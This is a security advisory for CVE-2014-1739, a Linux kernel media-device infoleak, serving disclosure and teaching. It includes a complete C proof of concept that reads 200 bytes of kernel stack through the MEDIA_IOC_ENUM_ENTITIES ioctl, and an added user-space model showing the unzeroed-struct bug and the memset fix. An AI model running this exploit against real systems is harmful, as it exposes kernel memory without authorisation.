Linux Kernel '/drivers/media/media-device.c' Local Information Leakage Vulnerability
Release date:
Updated on:
Affected Systems:
Linux kernel 2.6.38-3.15-rc2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68048
CVE (CAN) ID: CVE-2014-1739
The Linux kernel is the kernel of the Linux operating system.
Linux kernel 2.6.38 through 3.15-rc2 has a local information leak in the media_device_enum_entities() implementation. A local attacker can exploit this vulnerability to read kernel stack (kstack) bytes on x86_32.
<* Source: Salva Peiró *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
/*
 * $File: media-enum-poc.c
 * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.
 * $Author: Salva Peiró <speirofr@gmail.com> (c) Copyright 2014.
 * $URL: http://speirofr.appspot.com/files/media-enum-poc.c
 * $License: GPLv2.
 */

#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/media.h>

#define MEDIA_DEV "/dev/media0"

int main(int argc, char *argv[])
{
	struct media_entity_desc u_ent = {};
	char *file = MEDIA_DEV;
	int i, fd, ret;

	/* Optional argument: path of the media device node to query. */
	if (argc > 1)
		file = argv[1];

	fd = open(file, O_RDONLY);
	if (fd < 0) {
		perror("open " MEDIA_DEV);
		return -1;
	}

	/* Ask the driver for the first entity. */
	u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
	ret = ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);
	if (ret < 0) {
		perror("ioctl " MEDIA_DEV);
		return -1;
	}

	/* Dump reserved[] and raw[] as 32-bit words, four per row. */
	printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %zu kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw));
	for (i = 0; i < 200 / sizeof(uint32_t); i++) {
		uint32_t data = *((uint32_t *)&u_ent.reserved + i);
		if (i % 4 == 0)
			printf("\n %08d: ", i);
		printf("0x%08x ", data);
	}
	printf("\n");

	return ret;
}

/*
gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Linux
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.kernel.org/
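
The bug class behind this advisory, shown as an added user-space model (not kernel code and not the PoC author's code): a handler fills only some fields of a stack struct and copies the whole struct out, so the untouched 16-byte reserved[] and 184-byte raw[] carry whatever the stack held before; zeroing the struct first removes the leak. The simplified struct layout, the function names and the 0xAA "stale stack" fill are assumptions made for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of struct media_entity_desc (assumed layout). */
struct ent_desc {
    uint32_t id;
    char     name[32];
    uint32_t type;
    uint32_t reserved[4];  /* 16 bytes the handler never writes  */
    uint8_t  raw[184];     /* 184 bytes the handler never writes */
};

/* Models the ioctl handler: fill some fields, copy the whole struct out.
 * zero_first = 0 is the leaking pattern, zero_first = 1 the hardened one. */
static void enum_entities(struct ent_desc *frame, struct ent_desc *user, int zero_first)
{
    if (zero_first)
        memset(frame, 0, sizeof(*frame));
    frame->id = 1;
    snprintf(frame->name, sizeof(frame->name), "model-entity");
    frame->type = 1;
    memcpy(user, frame, sizeof(*user));  /* models copy_to_user() */
}

/* Run the handler over a frame pre-filled with 0xAA (constructed stand-in
 * for stale stack data); return the non-zero bytes in reserved[] + raw[]. */
static size_t run_model(int zero_first)
{
    struct ent_desc frame, user;
    const uint8_t *p = (const uint8_t *)&user + offsetof(struct ent_desc, reserved);
    size_t n = 0;

    memset(&frame, 0xAA, sizeof(frame));
    enum_entities(&frame, &user, zero_first);
    for (size_t i = 0; i < sizeof(user.reserved) + sizeof(user.raw); i++)
        n += (p[i] != 0);
    return n;
}

int main(void)
{
    printf("leaking: %zu stale bytes, hardened: %zu\n", run_model(0), run_model(1));
    return 0;
}
```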